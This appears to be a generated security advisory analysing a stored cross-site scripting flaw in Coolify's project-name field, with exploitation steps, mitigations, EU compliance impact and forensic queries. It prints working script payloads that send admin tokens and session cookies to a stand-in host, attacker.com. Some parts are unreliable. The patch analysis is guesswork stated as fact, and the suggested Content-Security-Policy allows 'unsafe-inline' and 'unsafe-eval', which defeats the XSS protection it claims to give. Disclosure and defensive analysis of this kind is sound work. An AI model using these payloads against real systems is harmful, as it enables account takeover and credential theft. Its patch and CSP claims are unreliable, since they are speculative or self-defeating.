Comprehensive Technical Analysis of EUVD-2025-206246 (CVE-2025-59158)

Stored Cross-Site Scripting (XSS) in Coolify (v4.0.0-beta.420.6 and prior)

1. Vulnerability Assessment and Severity Evaluation

Vulnerability Classification

• Type: Stored Cross-Site Scripting (XSS) – Persistent
• CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
• CVSS v4.0 Base Score: 9.4 (Critical)
  • Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
  • Key Metrics:
    • Attack Vector (AV:N): Network-based exploitation (remote attacker)
    • Attack Complexity (AC:L): Low (no specialized conditions required)
    • Privileges Required (PR:L): Low (authenticated user with "member" role)
    • User Interaction (UI:P): Required (admin must perform an action, e.g., deletion)
    • Impact Metrics (VC:H/VI:H/VA:H): High impact on confidentiality, integrity, and availability
    • Subsequent System Impact (SC:H/SI:H/SA:H): High risk of lateral movement, privilege escalation, or further compromise

Severity Justification

The vulnerability is critical due to:

• Low barrier to exploitation (only requires authenticated access with minimal privileges).
• High impact (arbitrary JavaScript execution in an admin’s browser context).
• Persistence (malicious payload remains stored in the application until triggered).
• Potential for privilege escalation (admin session hijacking, CSRF attacks, or further exploitation).

---

2. Potential Attack Vectors and Exploitation Methods

Exploitation Workflow

1. Initial Access:

   • Attacker gains access to a Coolify instance with a low-privilege account (e.g., "member" role).
   • No prior admin access is required.

2. Payload Injection:

   • Attacker creates a new project with a maliciously crafted name, e.g.:

     <script>fetch('/api/admin/tokens', {method: 'POST', credentials: 'include'}).then(r=>r.json()).then(d=>{fetch('https://attacker.com/exfil?token='+d.token)})</script>
     

   • The payload is stored in the database and rendered in the UI when viewed.

3. Triggering the Exploit:

   • An administrator logs in and performs an action that interacts with the malicious project (e.g., deletion, editing, or resource management).
   • The stored XSS payload executes in the admin’s browser, leading to:
     • Session hijacking (stealing cookies, CSRF tokens, or API keys).
     • Privilege escalation (impersonating the admin via stolen credentials).
     • Remote code execution (RCE) (if combined with other vulnerabilities, e.g., improper API access controls).
     • Data exfiltration (sending sensitive data to an attacker-controlled server).

Proof-of-Concept (PoC) Example

// Malicious project name payload (simplified)
"><img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

• When an admin deletes the project, the onerror event triggers, exfiltrating their session cookie.

Post-Exploitation Scenarios

• Admin Session Hijacking:
  • Steal HttpOnly cookies (if misconfigured) or CSRF tokens.
  • Perform actions on behalf of the admin (e.g., creating new users, modifying configurations).
• Lateral Movement:
  • If Coolify integrates with cloud providers (AWS, GCP, Azure), the attacker could escalate to cloud account compromise.
• Persistence:
  • Modify Coolify’s configuration to maintain access (e.g., adding a backdoor user).

---

3. Affected Systems and Software Versions

Vulnerable Versions

• Coolify versions ≤ v4.0.0-beta.420.6
• Patched Version: v4.0.0-beta.420.7 (released January 5, 2026)

Affected Components

• Project Creation Workflow (specifically the project name field).
• Project Deletion/Management UI (where the payload is rendered).

Deployment Scenarios at Risk

• Self-hosted Coolify instances (common in DevOps and cloud-native environments).
• Multi-tenant Coolify deployments (where low-privilege users can create projects).
• Integrations with CI/CD pipelines (if Coolify is used for deployment automation).

---

4. Recommended Mitigation Strategies

Immediate Actions

1. Upgrade to the Latest Version:

   • Apply Coolify v4.0.0-beta.420.7 or later immediately.
   • Verify the patch by checking the GitHub Advisory (GHSA-h52r-jxv9-9vhf).

2. Temporary Workarounds (if patching is delayed):

   • Input Sanitization:
     • Manually validate project names to block <script>, onerror=, and other XSS vectors.
     • Use a Content Security Policy (CSP) header to mitigate XSS impact:

       Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none';
       

   • Least Privilege Enforcement:
     • Restrict project creation to trusted users only (e.g., admins).
     • Audit user roles and remove unnecessary "member" privileges.
   • Monitoring & Logging:
     • Enable audit logging for project creation/deletion events.
     • Set up SIEM alerts for suspicious JavaScript patterns in project names.

Long-Term Security Hardening

1. Secure Development Practices:

   • Output Encoding: Ensure all user-supplied input is HTML-encoded before rendering.
   • Framework Protections: Use modern frameworks (React, Angular, Vue) with built-in XSS protections.
   • Automated Scanning: Integrate SAST/DAST tools (e.g., Semgrep, OWASP ZAP) into CI/CD pipelines.

2. Infrastructure-Level Protections:

   • Web Application Firewall (WAF):
     • Deploy a WAF (e.g., ModSecurity, Cloudflare) to block XSS payloads.
   • Network Segmentation:
     • Isolate Coolify instances from critical internal systems.
   • Zero Trust Architecture:
     • Enforce MFA for all Coolify users, especially admins.

3. Incident Response Planning:

   • Isolate Compromised Instances: If exploitation is detected, take the instance offline immediately.
   • Rotate Credentials: Reset all admin passwords, API keys, and session tokens.
   • Forensic Analysis: Check logs for signs of payload execution (e.g., unusual outbound HTTP requests).

---

5. Impact on the European Cybersecurity Landscape

Regulatory and Compliance Implications

• GDPR (General Data Protection Regulation):
  • If Coolify is used to manage personal data (e.g., customer databases), a successful XSS attack could lead to data breaches, triggering GDPR Article 33 (72-hour notification) and potential fines (up to 4% of global revenue).
• NIS2 Directive (Network and Information Security):
  • Organizations in critical sectors (energy, healthcare, finance) using Coolify may be subject to NIS2 reporting requirements if the vulnerability is exploited.
• DORA (Digital Operational Resilience Act):
  • Financial entities must ensure third-party risk management (Coolify as a vendor) and incident reporting under DORA.

Threat Landscape Considerations

• Targeted Attacks on DevOps Environments:
  • Coolify is popular in European DevOps and cloud-native ecosystems, making it an attractive target for APT groups and ransomware operators.
• Supply Chain Risks:
  • If Coolify is used to deploy third-party applications, an XSS exploit could lead to supply chain attacks (e.g., injecting malicious code into deployed apps).
• Critical Infrastructure Exposure:
  • Coolify is sometimes used in IoT/OT environments (e.g., managing edge devices). An XSS exploit could serve as an initial access vector for deeper network compromise.

ENISA and National CERT Recommendations

• ENISA Threat Landscape Report (2026):
  • Likely to highlight self-hosted DevOps tools as a growing attack surface.
• National CERTs (e.g., CERT-EU, BSI, ANSSI):
  • Expected to issue advisories urging organizations to patch Coolify instances.
  • May recommend proactive threat hunting for signs of XSS exploitation.

---

6. Technical Details for Security Professionals

Root Cause Analysis

• Vulnerable Code Path:

  • The project name input field in Coolify’s frontend (likely a React/Vue component) directly renders user input without proper sanitization.
  • When an admin interacts with the project (e.g., deletion), the DOM is updated dynamically, executing the stored payload.

• Patch Analysis (v4.0.0-beta.420.7):

  • Input Sanitization: Added DOMPurify or similar library to clean user input.
  • Output Encoding: Ensured all dynamic content is HTML-encoded before rendering.
  • CSP Headers: Introduced Content Security Policy to restrict inline script execution.

Exploitation Detection

• Log Indicators:

  • Unusual HTTP requests to external domains from Coolify’s backend.
  • JavaScript snippets in project names (e.g., <script>, onerror=).
  • Failed deletion attempts (if the payload breaks UI functionality).

• Network Indicators:

  • Outbound connections to attacker-controlled domains (e.g., attacker.com/exfil).
  • Unexpected API calls (e.g., /api/admin/tokens from a low-privilege user).

Forensic Investigation Steps

1. Check Project Names:

   SELECT * FROM projects WHERE name LIKE '%<script>%' OR name LIKE '%onerror=%';
   

2. Review Admin Activity Logs:
   • Look for unusual deletion/modification events by admins.
3. Analyze Web Server Logs:
   • Search for XSS payloads in GET/POST requests.
4. Memory Forensics (if available):
   • Check browser memory dumps for injected JavaScript execution.

Advanced Exploitation Techniques

• Chained Exploits:
  • Combine XSS with CSRF to force admin actions (e.g., creating a backdoor user).
  • Use WebSocket hijacking if Coolify uses real-time updates.
• Persistence Mechanisms:
  • Modify Coolify’s configuration files (e.g., .env, docker-compose.yml) to maintain access.
  • Inject malicious plugins if Coolify supports extensibility.

---

Conclusion

EUVD-2025-206246 (CVE-2025-59158) represents a critical stored XSS vulnerability in Coolify with severe implications for European organizations. The low barrier to exploitation, combined with the high impact of admin session hijacking, makes this a priority patching target.

Recommended Actions:

1. Patch immediately to v4.0.0-beta.420.7 or later.
2. Audit user roles and restrict project creation privileges.
3. Deploy WAF/CSP as compensating controls.
4. Monitor for exploitation and prepare an incident response plan.

Security teams should treat this vulnerability with high urgency, particularly in DevOps, cloud, and critical infrastructure environments. Failure to mitigate could lead to data breaches, regulatory penalties, and further network compromise.